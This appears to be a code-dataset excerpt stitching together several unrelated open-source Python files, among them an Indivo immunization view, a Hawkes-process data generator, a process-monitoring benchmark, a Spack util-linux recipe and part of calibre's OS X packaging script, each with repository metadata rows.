'bower_components/Chart.Scatter/Chart.Scatter.js',
'angular-locale_de-de.js',
'bower_components/spectrum/spectrum.js',
'bower_components/angular-spectrum-colorpicker/dist/angular-spectrum-colorpicker.js',
'js/utils.js',
'js/diary.js',
'js/app.js',
output='gen/app.js',
filters='rjsmin'
)
css = Bundle(
'css/styles.less',
'bower_components/angular-chart.js/dist/angular-chart.css',
'bower_components/bca-flag-sprite/css/flags.css',
'bower_components/fontawesome/css/font-awesome.min.css',
'bower_components/flag-icon-css/css/flag-icon.css',
'bower_components/spectrum/spectrum.css',
output='gen/styles.css',
filters='less,cssmin'
)
| mit | 5,983,798,227,055,680,000 | 38.196078 | 89 | 0.728364 | false |
newmediamedicine/indivo_server_1_0 | indivo/views/reports/immunization.py | 1 | 2097 | """
.. module:: views.reports.immunization
:synopsis: Indivo view implementations for the immunization report.
.. moduleauthor:: Daniel Haas <[email protected]>
.. moduleauthor:: Ben Adida <[email protected]>
"""
from django.http import HttpResponseBadRequest, HttpResponse
from indivo.lib.view_decorators import marsloader, DEFAULT_ORDERBY
from indivo.lib.query import FactQuery, DATE, STRING, NUMBER
from indivo.models import Immunization
IMMUNIZATION_FILTERS = {
'vaccine_type' : ('vaccine_type', STRING),
'date_administered': ('date_administered', DATE),
DEFAULT_ORDERBY : ('created_at', DATE)
}
IMMUNIZATION_TEMPLATE = 'reports/immunization.xml'
def immunization_list(*args, **kwargs):
""" List the immunization data for a given record.
For 1:1 mapping of URLs to views. Just calls
:py:meth:`~indivo.views.reports.immunization._immunization_list`.
"""
return _immunization_list(*args, **kwargs)
def carenet_immunization_list(*args, **kwargs):
""" List the immunization data for a given carenet.
For 1:1 mapping of URLs to views. Just calls
:py:meth:`~indivo.views.reports.immunization._immunization_list`.
"""
return _immunization_list(*args, **kwargs)
@marsloader(query_api_support=True)
def _immunization_list(request, group_by, date_group, aggregate_by,
limit, offset, order_by,
status, date_range, filters,
record=None, carenet=None):
""" List the immunization objects matching the passed query parameters.
See :doc:`/query-api` for a listing of valid parameters.
Will return :http:statuscode:`200` with a list of immunizations on success,
:http:statuscode:`400` if any invalid query parameters were passed.
"""
q = FactQuery(Immunization, IMMUNIZATION_FILTERS,
group_by, date_group, aggregate_by,
limit, offset, order_by,
status, date_range, filters,
record, carenet)
try:
return q.render(IMMUNIZATION_TEMPLATE)
except ValueError as e:
return HttpResponseBadRequest(str(e))
| gpl-3.0 | 8,928,572,799,692,341,000 | 31.261538 | 77 | 0.692895 | false |
Sam-Gram/PiWood-Derby | track.py | 1 | 1071 | import time
from displays import Displays
from sensors import Sensors
class Track():
def __init__(self):
self.sensors = Sensors()
self.displays = Displays()
def startRace(self):
self.displays.clear()
self.sensors.start()
def stopRace(self):
# No need to keep sensing when no race is happening
self.sensors.stop()
self.displays.displayTimes(self.sensors.getTimes())
return self.sensors.getTimes()
def getTimes(self):
return self.sensors.getTimes()
def test(self):
self.displays.displayHex([0xba5e, 0xba11, 0x0])
time.sleep(2)
self.displays.displayHex([0x0, 0xcafe, 0xbabe])
time.sleep(2)
self.displays.displayHex([0xdead, 0x0, 0xbeef])
time.sleep(2)
self.displays.clear()
time.sleep(1)
currentTime = time.time()
while (currentTime + 12.0) > time.time():
self.displays.displayTimes(self.sensors.getState())
print self.sensors.getGateInput()
self.displays.clear()
| mit | 1,294,967,940,751,215,900 | 28.75 | 63 | 0.615313 | false |
slinderman/pyhawkes | data/synthetic/generate_synthetic_data.py | 1 | 4150 | import pickle
import os
import gzip
import numpy as np
import matplotlib.pyplot as plt
from pyhawkes.models import DiscreteTimeNetworkHawkesModelSpikeAndSlab
from pyhawkes.plotting.plotting import plot_network
def generate_synthetic_data(seed=None):
"""
Create a discrete time Hawkes model and generate from it.
:return:
"""
if seed is None:
seed = np.random.randint(2**32)
print("Setting seed to ", seed)
np.random.seed(seed)
# Create a true model
# Larger v (weight scale) implies smaller weights
T_test=1000
# Debugging network:
# C = 1
# K = 4
# T = 1000
# dt = 1.0
# B = 3
# p = 0.5
# kappa = 3.0
# v = kappa * 5.0
# c = np.zeros(K, dtype=np.int)
# Small network:
# Seed: 1957629166
# C = 4
# K = 20
# T = 10000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.9 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (5.0 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Medium network:
# Seed: 2723361959
# C = 5
# K = 50
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.75 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (9 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Medium netowrk 2:
# Seed = 3848328624
# C = 5
# K = 50
# T = 100000
# dt = 1.0
# B = 3
# kappa = 2.0
# c = np.arange(C).repeat((K // C))
# p = 0.4 * np.eye(C) + 0.01 * (1-np.eye(C))
# v = kappa * (5 * np.eye(C) + 5.0 * (1-np.eye(C)))
# Medium netowrk, one cluster
# Seed: 3848328624
C = 1
K = 50
T = 100000
dt = 1.0
B = 3
p = 0.08
kappa = 3.0
v = kappa * 5.0
c = np.zeros(K, dtype=np.int)
# Large network:
# Seed = 2467634490
# C = 5
# K = 100
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.4 * np.eye(C) + 0.025 * (1-np.eye(C))
# v = kappa * (10 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Large network 2:
# Seed =
# C = 10
# K = 100
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.75 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (9 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Extra large network:
# Seed: 2327447870
# C = 20
# K = 1000
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.25 * np.eye(C) + 0.0025 * (1-np.eye(C))
# v = kappa * (15 * np.eye(C) + 30.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Create the model with these parameters
network_hypers = {'C': C, 'kappa': kappa, 'c': c, 'p': p, 'v': v}
# Create a simple network
from pyhawkes.internals.network import ErdosRenyiFixedSparsity
network = ErdosRenyiFixedSparsity(K, p, kappa, v=v)
true_model = DiscreteTimeNetworkHawkesModelSpikeAndSlab(K=K, dt=dt, B=B,
network=network)
assert true_model.check_stability()
# Plot the true network
plt.ion()
plot_network(true_model.weight_model.A,
true_model.weight_model.W)
plt.pause(0.001)
# Sample from the true model
S,R = true_model.generate(T=T, keep=False, print_interval=50)
# Pickle and save the data
out_dir = os.path.join('data', "synthetic")
out_name = 'synthetic_K%d_C%d_T%d.pkl.gz' % (K,C,T)
out_path = os.path.join(out_dir, out_name)
with gzip.open(out_path, 'w') as f:
print("Saving output to ", out_path)
pickle.dump((S, true_model), f, protocol=-1)
# Sample test data
S_test,_ = true_model.generate(T=T_test, keep=False)
# Pickle and save the data
out_dir = os.path.join('data', "synthetic")
out_name = 'synthetic_test_K%d_C%d_T%d.pkl.gz' % (K,C,T_test)
out_path = os.path.join(out_dir, out_name)
with gzip.open(out_path, 'w') as f:
print("Saving output to ", out_path)
pickle.dump((S_test, true_model), f, protocol=-1)
# demo(2203329564)
generate_synthetic_data(3848328624)
| mit | 1,682,420,631,108,487,000 | 24 | 76 | 0.521687 | false |
zhanxw/bench | scripts/monitor.py | 1 | 10275 | #!/usr/bin/env python
import sys, os
from itertools import chain
# d is a pandas.DataFrame
def printTable(d, sep = ' ', outFile = sys.stderr):
cols = d.columns
col_widths = list(max(len(str(elem)) for elem in chain(d[col], [col])) for col in cols)
print >> sys.stderr, ' '.join('{value:>{width}}'.format(value=str(name), width=width) for name,width in zip(cols, col_widths))
for row in d.iterrows():
print >> sys.stderr, ' '.join('{value:>{width}}'.format(value=str(name), width=width) for name,width in zip(row[1], col_widths))
def calculateMean(timePoint, value):
#print "tp = ", timePoint
#print "value = ", value
if len(value) == 1:
return value
value = value[0:-1]
weight = timePoint[1:] - timePoint[0:-1]
totalSpan = timePoint[-1] - timePoint[0]
if any((i < 0 for i in weight)):
print >> sys.stderr, "Timepoint is not monotonelly increasing!"
return 0.
if totalSpan == 0.0:
return value[0]
avg = np.sum(weight * value) / totalSpan
return avg
def draw(dRaw, dg, outFile):
try:
import matplotlib
import matplotlib.pyplot as plt
except:
print >> sys.stderr, "Cannot import matplotlib, skipping generating graphs"
return
plt.rc('legend', fontsize=6)
plt.rc('ytick', labelsize = 'small')
fig = plt.figure(figsize = (15, 15))
ax = fig.add_subplot(3, 3, 1)
## increase space between subplots
fig.subplots_adjust(wspace = .5, hspace = .5)
getProgName = lambda x: x.split()[0].split('/')[-1]
dg['prog'] = dg.apply(lambda x: getProgName(x['cmd']) + '(%d)' % x['pid'] ,axis = 1)
dg.index = dg['prog']
dg[['utime']].plot(kind = 'barh', title = "User Time (s)", ax = ax)
plt.ylabel('')
# plt.yticks(rotation = 45) # this does not produce nice looking graphs
ax = fig.add_subplot(3, 3, 2)
dg[['stime']].plot(kind = 'barh', title = "System Time (s)", ax = ax)
plt.ylabel('')
ax = fig.add_subplot(3, 3, 3)
dg[['rtime']].plot(kind = 'barh', title = "Real Time (s)", ax = ax)
plt.ylabel('')
def scaleUnit(x):
if (x.max() > 1024 ** 3).all():
return ( 1024 ** 3, "Gb")
if (x.max() > 1024 ** 2).all():
return ( 1024 ** 2, "Mb")
if (x.max() > 1024).all():
return ( 1024, "Kb")
return ( 1, "B")
rssScale = scaleUnit(dRaw[['rss']])
dg[['maxRss']] = dg[['maxRss']] / rssScale[0]
ax = fig.add_subplot(3, 3, 4)
dg[['maxRss']].plot(kind = 'barh', title = "Max RSS (" + rssScale[1]+")", ax = ax)
plt.ylabel('')
dg[['avgRss']] = dg[['avgRss']] / rssScale[0]
ax = fig.add_subplot(3, 3, 5)
dg[['avgRss']].plot(kind = 'barh', title = "Avg RSS (" + rssScale[1]+")", ax = ax)
plt.ylabel('')
vmsScale = scaleUnit(dRaw[['vms']])
dg[['maxVms']] = dg[['maxVms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 6)
dg[['maxVms']].plot(kind = 'barh', title = "Max VMS (" + vmsScale[1]+")", ax = ax)
plt.ylabel('')
dg[['avgVms']] = dg[['avgVms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 7)
dg[['avgVms']].plot(kind = 'barh', title = "Avg VMS (" + vmsScale[1]+")", ax = ax)
plt.ylabel('')
def calculateYLimit(x, coef = 1.5):
a, b = x.min(), x.max()
c = (a + b) / 2
d = c - a
if d == 0.0:
return (a - 1, b + 1)
return (c - d * 1.5, c + d * 1.5)
dRaw['prog'] = dRaw.apply(lambda x: getProgName(x['cmd']) + '(%d)' % x['pid'] ,axis = 1)
dRaw['rss'] = dRaw['rss'] / rssScale[0]
ax = fig.add_subplot(3, 3, 8)
for k, v in dRaw.groupby('prog'):
plt.plot(v['rtime'], v['rss'], label = k, marker = '.')
plt.ylim(calculateYLimit(dRaw['rss']))
plt.title("RSS (%s) vs. Real Time (s)" % rssScale[1])
plt.legend()
#plt.legend(bbox_to_anchor=(1.05, 1), loc = 2)
dRaw[['vms']] = dRaw[['vms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 9)
for k, v in dRaw.groupby('prog'):
plt.plot(v['rtime'], v['vms'], label = k, marker = '.')
plt.ylim(calculateYLimit(dRaw['vms']))
plt.title("VMS (%s) vs. Real Time (s)" % vmsScale[1])
plt.legend()
#plt.legend(bbox_to_anchor=(1.05, 1), loc = 2)
fig.savefig(outFile)
def usage():
print("Usage: ")
print("%s [-i interval] [-o outputFile] [-s] [-t] [-g] [-q] commands" % sys.argv[0] )
print(" -i interval: sampling interval")
print(" -o outputFile: benchmark summary printed to 'outputFile' (default: stderr)")
print(" -t: output trace of benchmarking metrics (default: stderr; use -o to change)")
print(" -g: output a PNG graph showing cpu and memory usage (need matplotlib)")
print(" -q: quiet mode, do not output anything to the console")
print
if __name__ == '__main__':
try:
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'i:o:hstgq')
optlist = dict(optlist)
interval = float(optlist.get('-i', 0.1))
## to avoid record too many snapshots, scale up the value of interval
if '-i' in optlist:
intervalScaling = None
else:
intervalScaling = 2 * interval
if interval <= 0:
print >> sys.stderr, "Sampling interval should be larger than zero, but [ %s ] given" % optlist.get('-i')
sys.exit(1)
if '-o' in optlist:
outFile = optlist['-o']
else:
outFile = sys.stderr
# useShell = '-s' in optlist
outGraph = '-g' in optlist
outTrace = '-t' in optlist
trace = outGraph or outTrace
quietMode = '-q' in optlist
if '-h' in optlist:
usage()
sys.exit(0)
if len(args) == 0:
print >> sys.stderr, "No command(s) given. See helps below..."
usage()
sys.exit(0)
## print 'args = ', args
command = args
except:
usage()
raise
sys.exit(1)
import time
import psutil
import numpy as np
import pandas as pd
if outTrace:
print >> sys.stderr, '\t'.join(['pid', 'ppid', 'utime', 'stime', 'rtime', 'rss', 'vms', 'cwd', 'cmd'])
startTime = time.time()
mainProc = psutil.Popen(command, shell = False)
result = [] # time, pid, cwd, cmd, cpu_times, mem_info
# gather metrics while process/sub-process is still running.
activeSet = set() ##
activeSet.add(mainProc)
while activeSet:
## put all processes to the active queuee
newActiveSet = set()
mainProc.poll() ## need to call poll() so is_running() can work
for p in activeSet:
if p in newActiveSet: continue
try:
children = p.children()
for c in children:
if c.is_running():
newActiveSet.add(c)
except psutil.NoSuchProcess:
continue
activeSet |= newActiveSet
## examine each active proc
## remove inactive proc
toRemoveSet = set()
for p in activeSet:
try:
val = [
time.time() - startTime,
p.pid,
p.ppid(),
p.cpu_times(),
p.memory_info(),
p.cwd(),
p.cmdline()
]
except (psutil.NoSuchProcess, psutil.AccessDenied):
val = [
time.time() - startTime,
None,
None,
None,
None,
None,
None
]
if outTrace:
if val[1] != None:
print >> sys.stderr, '\t'.join(map(str, [val[1], val[2], val[3].user, val[3].system,val[0], val[4].rss, val[4].vms, val[5], ' '.join(val[6])]))
else:
print >> sys.stderr, '\t'.join(map(str, [None, None, None, None, val[0], None, None, None,None]))
if val[1] != None:
result.append(val)
if not p.is_running():
toRemoveSet.add(p)
activeSet -= toRemoveSet
## automatically increase check interval to save memory
if intervalScaling and len(result) % 1000 == 0:
interval = intervalScaling
intervalScaling *= 2
## wait a bit
time.sleep(interval)
# Summarize results
df = pd.DataFrame.from_items([('pid', [i[1] for i in result]),
('ppid', [i[2] for i in result]),
('utime', [i[3].user for i in result]),
('stime', [i[3].system for i in result]),
('rtime', [i[0] for i in result]),
('rss', [i[4].rss for i in result]),
('vms', [i[4].vms for i in result]),
('cwd', [i[5] for i in result]),
('cmd', [' '.join(i[6]) for i in result])
])
if outFile != sys.stderr:
df.to_csv(outFile + ".trace.csv", index = False)
# Group by pid
def f(x):
tp = np.copy(x['rtime'])
x['utime'] = np.max(x['utime'])
x['stime'] = np.max(x['stime'])
x['rtime'] = np.max(x['rtime'])
x['maxRss'] = np.max(x['rss'])
x['maxVms'] = np.max(x['vms'])
x['avgRss'] = calculateMean(tp, x['rss'])
x['avgVms'] = calculateMean(tp, x['vms'])
return x
dOut = df.groupby('pid').apply(f)
dOut = dOut.drop_duplicates(subset = 'pid')
dOut = pd.concat([dOut.drop(['cwd','cmd'], axis = 1), dOut[['cwd','cmd']]], axis = 1)
# print df
# print dOut
if outFile != sys.stderr:
dOut.to_csv(outFile + '.csv', index = False)
elif not quietMode:
printTable(dOut)
if outGraph:
if outFile == sys.stderr:
draw(df, dOut, "bench.png")
else:
draw(df, dOut, outFile + ".png")
| gpl-2.0 | -1,233,636,329,327,026,400 | 34.926573 | 163 | 0.493917 | false |
shawnhermans/olivaw | ml/classifiers.py | 1 | 2961 | from sklearn import cross_validation
from sklearn.ensemble import RandomForestClassifier
from ml.metrics import BinaryClassifierMetricsFactory
from ml.vectorizers import prepare_dataset
class BinaryRandomForestClassifier(object):
def __init__(self, clf, vectorizer):
self._clf = clf
self._vectorizer = vectorizer
if not self.is_binary:
raise ValueError('BinaryRandomForestClassifier only supports binary label values')
self._true_index = list(self.class_labels).index('True')
@property
def is_binary(self):
if len(self.class_labels) == 2:
if 'True' in self.class_labels and 'False' in self.class_labels:
return True
return False
def _true_prediction_probs(self, predictions):
return list(predictions.transpose()[self._true_index])
def predict_instances(self, instances):
"""
Expects instances from the DB model
"""
x = self._vectorizer.vectorize_instances(instances)
predictions = self._clf.predict_proba(x)
return self._true_prediction_probs(predictions)
def predict_records(self, records):
"""
Expects array of dicts
"""
x = self._vectorizer.vectorize_records(records)
predictions = self._clf.predict_proba(x)
return self._true_prediction_probs(predictions)
def predict_vectors(self, vectors):
"""
Expects an vectorized ndarray for input
"""
predictions = self._clf.predict_proba(vectors)
return self._true_prediction_probs(predictions)
@property
def feature_importances(self):
return self._vectorizer.inverse_transform(self._clf.feature_importances_)[0]
@property
def class_labels(self):
return self._clf.classes_
class ClassifierFactory(object):
@classmethod
def build_binary_random_forest_classifier(cls, training_dataset, target_attribute, vectorizer, n_estimators=10):
classifier = RandomForestClassifier(n_estimators=n_estimators, n_jobs=-1)
records, labels = prepare_dataset(training_dataset, target_attribute)
vector_data = vectorizer.vectorize_records(records)
x_train, x_test, y_train, y_test = cls._train_test_split(vector_data, labels)
cls._fit_model(x_train, y_train, classifier)
classifier = BinaryRandomForestClassifier(classifier, vectorizer)
metrics = BinaryClassifierMetricsFactory.build_binary_classifier_metrics(x_test, y_test, classifier)
return classifier, metrics
@classmethod
def _train_test_split(cls, vector_data, labels):
x = vector_data
y = labels
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1, random_state=0)
return x_train, x_test, y_train, y_test
@classmethod
def _fit_model(cls, x_train, y_train, classifier):
classifier.fit(x_train, y_train)
| bsd-3-clause | 2,756,950,344,969,688,000 | 33.835294 | 116 | 0.669031 | false |
LLNL/spack | var/spack/repos/builtin/packages/util-linux/package.py | 1 | 2266 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class UtilLinux(AutotoolsPackage):
"""Util-linux is a suite of essential utilities for any Linux system."""
homepage = "https://github.com/karelzak/util-linux"
url = "https://www.kernel.org/pub/linux/utils/util-linux/v2.29/util-linux-2.29.2.tar.gz"
list_url = "https://www.kernel.org/pub/linux/utils/util-linux"
list_depth = 1
version('2.35.1', sha256='37ac05d82c6410d89bc05d43cee101fefc8fe6cf6090b3ce7a1409a6f35db606')
version('2.35', sha256='98acab129a8490265052e6c1e033ca96d68758a13bb7fcd232c06bf16cc96238')
version('2.34', sha256='b62c92e5e1629642113cd41cec1ee86d1ee7e36b8ffe8ec3ac89c11797e9ac25')
version('2.33', sha256='952fb0d3498e81bd67b3c48e283c80cb12c719bc2357ec5801e7d420991ad319')
version('2.29.2', sha256='29ccdf91d2c3245dc705f0ad3bf729ac41d8adcdbeff914e797c552ecb04a4c7')
version('2.29.1', sha256='a6a7adba65a368e6dad9582d9fbedee43126d990df51266eaee089a73c893653')
version('2.25', sha256='7e43273a9e2ab99b5a54ac914fddf5d08ba7ab9b114c550e9f03474672bd23a1')
depends_on('[email protected]:')
depends_on('pkgconfig')
depends_on('gettext', when='+libmount')
# Make it possible to disable util-linux's libuuid so that you may
# reliably depend_on(`libuuid`).
variant('libuuid', default=True, description='Build libuuid')
variant('libmount', default=False, description='Build libmount.so with gettext')
def url_for_version(self, version):
url = "https://www.kernel.org/pub/linux/utils/util-linux/v{0}/util-linux-{1}.tar.gz"
return url.format(version.up_to(2), version)
def setup_build_environment(self, env):
if '+libmount' in self.spec:
env.append_flags('LDFLAGS', '-L{0} -lintl'.format(
self.spec['gettext'].prefix.lib))
def configure_args(self):
config_args = [
'--disable-use-tty-group',
'--disable-makeinstall-chown',
'--without-systemd'
]
config_args.extend(self.enable_or_disable('libuuid'))
return config_args
| lgpl-2.1 | 1,896,356,911,546,345,500 | 44.32 | 97 | 0.704766 | false |
yeyanchao/calibre | setup/installer/osx/app/main.py | 1 | 23748 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import sys, os, shutil, plistlib, subprocess, glob, zipfile, tempfile, \
py_compile, stat, operator
abspath, join, basename = os.path.abspath, os.path.join, os.path.basename
from setup import __version__ as VERSION, __appname__ as APPNAME, basenames, \
modules as main_modules, Command, SRC, functions as main_functions
LICENSE = open('LICENSE', 'rb').read()
MAGICK_HOME='@executable_path/../Frameworks/ImageMagick'
ENV = dict(
FC_CONFIG_DIR='@executable_path/../Resources/fonts',
FC_CONFIG_FILE='@executable_path/../Resources/fonts/fonts.conf',
MAGICK_CONFIGURE_PATH=MAGICK_HOME+'/config',
MAGICK_CODER_MODULE_PATH=MAGICK_HOME+'/modules-Q16/coders',
MAGICK_CODER_FILTER_PATH=MAGICK_HOME+'/modules-Q16/filter',
QT_PLUGIN_PATH='@executable_path/../MacOS',
PYTHONIOENCODING='UTF-8',
)
SW = os.environ.get('SW', '/sw')
info = warn = None
class OSX32_Freeze(Command):
description = 'Freeze OSX calibre installation'
def add_options(self, parser):
parser.add_option('--test-launchers', default=False,
action='store_true',
help='Only build launchers')
def run(self, opts):
global info, warn
info, warn = self.info, self.warn
main(opts.test_launchers)
def compile_launcher_lib(contents_dir, gcc, base):
info('\tCompiling calibre_launcher.dylib')
fd = join(contents_dir, 'Frameworks')
dest = join(fd, 'calibre-launcher.dylib')
src = join(base, 'util.c')
cmd = [gcc] + '-Wall -arch i386 -arch x86_64 -dynamiclib -std=gnu99'.split() + [src] + \
['-I'+base] + \
['-I/sw/python/Python.framework/Versions/Current/Headers'] + \
'-current_version 1.0 -compatibility_version 1.0'.split() + \
'-fvisibility=hidden -o'.split() + [dest] + \
['-install_name',
'@executable_path/../Frameworks/'+os.path.basename(dest)] + \
['-F/sw/python', '-framework', 'Python', '-framework', 'CoreFoundation', '-headerpad_max_install_names']
info('\t'+' '.join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
return dest
def compile_launchers(contents_dir, xprograms, pyver):
gcc = os.environ.get('CC', 'gcc')
base = os.path.dirname(__file__)
lib = compile_launcher_lib(contents_dir, gcc, base)
src = open(join(base, 'launcher.c'), 'rb').read()
env, env_vals = [], []
for key, val in ENV.items():
env.append('"%s"'% key)
env_vals.append('"%s"'% val)
env = ', '.join(env)+', '
env_vals = ', '.join(env_vals)+', '
src = src.replace('/*ENV_VARS*/', env)
src = src.replace('/*ENV_VAR_VALS*/', env_vals)
programs = [lib]
for program, x in xprograms.items():
module, func = x
info('\tCompiling', program)
out = join(contents_dir, 'MacOS', program)
programs.append(out)
psrc = src.replace('**PROGRAM**', program)
psrc = psrc.replace('**MODULE**', module)
psrc = psrc.replace('**FUNCTION**', func)
psrc = psrc.replace('**PYVER**', pyver)
fsrc = '/tmp/%s.c'%program
with open(fsrc, 'wb') as f:
f.write(psrc)
cmd = [gcc, '-Wall', '-arch', 'x86_64', '-arch', 'i386',
'-I'+base, fsrc, lib, '-o', out,
'-headerpad_max_install_names']
info('\t'+' '.join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
return programs
def flipwritable(fn, mode=None):
"""
Flip the writability of a file and return the old mode. Returns None
if the file is already writable.
"""
if os.access(fn, os.W_OK):
return None
old_mode = os.stat(fn).st_mode
os.chmod(fn, stat.S_IWRITE | old_mode)
return old_mode
STRIPCMD = ['/usr/bin/strip', '-x', '-S', '-']
def strip_files(files, argv_max=(256 * 1024)):
"""
Strip a list of files
"""
tostrip = [(fn, flipwritable(fn)) for fn in files if os.path.exists(fn)]
while tostrip:
cmd = list(STRIPCMD)
flips = []
pathlen = reduce(operator.add, [len(s) + 1 for s in cmd])
while pathlen < argv_max:
if not tostrip:
break
added, flip = tostrip.pop()
pathlen += len(added) + 1
cmd.append(added)
flips.append((added, flip))
else:
cmd.pop()
tostrip.append(flips.pop())
os.spawnv(os.P_WAIT, cmd[0], cmd)
for args in flips:
flipwritable(*args)
def flush(func):
def ff(*args, **kwargs):
sys.stdout.flush()
sys.stderr.flush()
ret = func(*args, **kwargs)
sys.stdout.flush()
sys.stderr.flush()
return ret
return ff
class Py2App(object):
FID = '@executable_path/../Frameworks'
def __init__(self, build_dir, test_launchers=False):
self.build_dir = build_dir
self.contents_dir = join(self.build_dir, 'Contents')
self.resources_dir = join(self.contents_dir, 'Resources')
self.frameworks_dir = join(self.contents_dir, 'Frameworks')
self.version_info = '.'.join(map(str, sys.version_info[:2]))
self.site_packages = join(self.resources_dir, 'Python', 'site-packages')
self.to_strip = []
self.warnings = []
self.run(test_launchers)
def warn(self, *args):
warn(*args)
def run(self, test_launchers):
ret = 0
if not test_launchers:
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
os.makedirs(self.build_dir)
self.create_skeleton()
self.create_plist()
self.add_python_framework()
self.add_site_packages()
self.add_stdlib()
self.add_qt_frameworks()
self.add_calibre_plugins()
self.add_podofo()
self.add_poppler()
self.add_libjpeg()
self.add_libpng()
self.add_fontconfig()
self.add_imagemagick()
self.add_misc_libraries()
self.add_resources()
self.compile_py_modules()
self.create_console_app()
self.copy_site()
self.create_exe()
if not test_launchers:
self.strip_files()
ret = self.makedmg(self.build_dir, APPNAME+'-'+VERSION)
return ret
@flush
def add_resources(self):
shutil.copytree('resources', os.path.join(self.resources_dir,
'resources'))
@flush
def strip_files(self):
info('\nStripping files...')
strip_files(self.to_strip)
@flush
def create_exe(self):
info('\nCreating launchers')
programs = {}
progs = []
for x in ('console', 'gui'):
progs += list(zip(basenames[x], main_modules[x], main_functions[x]))
for program, module, func in progs:
programs[program] = (module, func)
programs = compile_launchers(self.contents_dir, programs,
self.version_info)
for out in programs:
self.fix_dependencies_in_lib(out)
@flush
def set_id(self, path_to_lib, new_id):
old_mode = flipwritable(path_to_lib)
subprocess.check_call(['install_name_tool', '-id', new_id, path_to_lib])
if old_mode is not None:
flipwritable(path_to_lib, old_mode)
@flush
def get_dependencies(self, path_to_lib):
raw = subprocess.Popen(['otool', '-L', path_to_lib],
stdout=subprocess.PIPE).stdout.read()
for line in raw.splitlines():
if 'compatibility' not in line or line.strip().endswith(':'):
continue
idx = line.find('(')
path = line[:idx].strip()
yield path
@flush
def get_local_dependencies(self, path_to_lib):
for x in self.get_dependencies(path_to_lib):
for y in (SW+'/lib/', '/usr/local/lib/', SW+'/qt/lib/',
'/opt/local/lib/',
SW+'/python/Python.framework/', SW+'/freetype/lib/'):
if x.startswith(y):
if y == SW+'/python/Python.framework/':
y = SW+'/python/'
yield x, x[len(y):]
break
@flush
def change_dep(self, old_dep, new_dep, path_to_lib):
info('\tResolving dependency %s to'%old_dep, new_dep)
subprocess.check_call(['install_name_tool', '-change', old_dep, new_dep,
path_to_lib])
@flush
def fix_dependencies_in_lib(self, path_to_lib):
info('\nFixing dependencies in', path_to_lib)
self.to_strip.append(path_to_lib)
old_mode = flipwritable(path_to_lib)
for dep, bname in self.get_local_dependencies(path_to_lib):
ndep = self.FID+'/'+bname
self.change_dep(dep, ndep, path_to_lib)
if list(self.get_local_dependencies(path_to_lib)):
raise Exception('Failed to resolve deps in: '+path_to_lib)
if old_mode is not None:
flipwritable(path_to_lib, old_mode)
@flush
def add_python_framework(self):
info('\nAdding Python framework')
src = join('/sw/python', 'Python.framework')
x = join(self.frameworks_dir, 'Python.framework')
curr = os.path.realpath(join(src, 'Versions', 'Current'))
currd = join(x, 'Versions', basename(curr))
rd = join(currd, 'Resources')
os.makedirs(rd)
shutil.copy2(join(curr, 'Resources', 'Info.plist'), rd)
shutil.copy2(join(curr, 'Python'), currd)
self.set_id(join(currd, 'Python'),
self.FID+'/Python.framework/Versions/%s/Python'%basename(curr))
@flush
def add_qt_frameworks(self):
info('\nAdding Qt Framework')
for f in ('QtCore', 'QtGui', 'QtXml', 'QtNetwork', 'QtSvg', 'QtWebKit',
'QtXmlPatterns'):
self.add_qt_framework(f)
for d in glob.glob(join(SW, 'qt', 'plugins', '*')):
shutil.copytree(d, join(self.contents_dir, 'MacOS', basename(d)))
for l in glob.glob(join(self.contents_dir, 'MacOS', '*/*.dylib')):
self.fix_dependencies_in_lib(l)
x = os.path.relpath(l, join(self.contents_dir, 'MacOS'))
self.set_id(l, '@executable_path/'+x)
@flush
def add_qt_framework(self, f):
libname = f
f = f+'.framework'
src = join(SW, 'qt', 'lib', f)
ignore = shutil.ignore_patterns('Headers', '*.h', 'Headers/*')
dest = join(self.frameworks_dir, f)
shutil.copytree(src, dest, symlinks=True,
ignore=ignore)
lib = os.path.realpath(join(dest, libname))
rpath = os.path.relpath(lib, self.frameworks_dir)
self.set_id(lib, self.FID+'/'+rpath)
self.fix_dependencies_in_lib(lib)
@flush
def create_skeleton(self):
c = join(self.build_dir, 'Contents')
for x in ('Frameworks', 'MacOS', 'Resources'):
os.makedirs(join(c, x))
for x in ('library.icns', 'book.icns'):
shutil.copyfile(join('icons', x), join(self.resources_dir, x))
@flush
def add_calibre_plugins(self):
dest = join(self.frameworks_dir, 'plugins')
os.mkdir(dest)
for f in glob.glob('src/calibre/plugins/*.so'):
shutil.copy2(f, dest)
self.fix_dependencies_in_lib(join(dest, basename(f)))
@flush
def create_plist(self):
from calibre.ebooks import BOOK_EXTENSIONS
env = dict(**ENV)
env['CALIBRE_LAUNCHED_FROM_BUNDLE']='1';
docs = [{'CFBundleTypeName':'E-book',
'CFBundleTypeExtensions':list(BOOK_EXTENSIONS),
'CFBundleTypeRole':'Viewer',
}]
